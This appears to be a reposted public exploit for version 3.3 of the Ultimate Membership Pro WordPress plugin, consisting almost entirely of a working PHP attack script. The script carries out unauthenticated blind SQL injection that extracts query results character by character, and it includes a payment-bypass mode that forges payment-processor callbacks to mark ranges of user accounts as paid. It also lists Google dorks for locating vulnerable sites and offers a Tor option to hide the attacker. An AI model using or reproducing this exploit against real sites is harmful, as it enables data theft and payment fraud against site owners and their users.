WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection
来源:wp0Day.com 作者:wp0Day 发布时间:2016-07-01
<?php /** * Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit * Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password" * Exploit Author: wp0Day.com <contact@wp0day.com> * Vendor Homepage: http://wpindeed.com/ * Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253 * Version: 3.3 * Tested on: Debian 8, PHP 5.6.17-3 * Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass * Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:m:l:e:s:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ###\n"; echo "Setting TOR Proxy...\n"; $curl->addOption(CURLOPT_PROXY,""); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address\n"; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()."\n"; echo "Are you sure you want to do this?\nType 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting!\n"); } echo "OK...\n"; } function isTrue($sql){ global $curl, $options; $levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#"; $data = array( 'action'=>'ihc_preview_user_listing', 'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]' ); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); return preg_match('~ihc_public_list_users_(\d+)~',$resp); } function exploit(){ global $curl, $options; if ($options['m'] == 'pay'){ $level = $options['l']; for($i=$options['s']; $i<$options['e']; $i++){ //This is mental, no IP or Hash check! echo "Paying Level $level to UserID: $i\n"; $data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level); $curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data); //echo $curl->getResponse(); } } if ($options['m'] == 'sql'){ $query = $options['s']; echo "'Running' SQL Query: $query\n"; echo "Getting Length"; $max_length = 100; //Well, it is messed up, can use , (comma) in the query //Binary search or divide et impera is possible with the BETWEEN operator //Code it yourself :) $len = 0; for ($i=1;$i<$max_length;$i++){ $sql_len = "(select char_length( ($query) ) = $i )"; if (isTrue($sql_len)){ echo "\nLength found: $i\n"; $len = $i; break; } else { echo "."; } } if ($len !== 0 ){ echo "Reading char by char\nResponse:\n"; } else { die("Failed getting length!\nAboring.\n\n"); } $charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ'; for ($i=1;$i<$len;$i++){ $got = false; for ($j=0;$j<strlen($charset);$j++){ $chr = $charset[$j]; $question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' "; if (isTrue($question)){ echo $charset[$j]; $got = true; break; } } if (!$got){ echo "?"; } } echo "\n\n"; } } exploit(); function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){ return false; } if ($options['m'] == 'sql' && !isset($options['s'])) { return false; } if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) { return false; } if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) { echo "In pay mode -s -e and -l must be numeric!\n"; return false; } $options['tor'] = isset($options['tor']); return $options; } function showHelp(){ global $argv; $help = <<<EOD Ultimate Membership Pro WordPress Plugin Exploit Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL] [MODE] sql - Blind SQL Inject mode* pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID *Note: You can't use , (comma) in the query. Examples: php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()' php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1 Marks all users with UserID between 0 and 1000 as paying customer for level ID 1 Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help."\n\n"; die(); }
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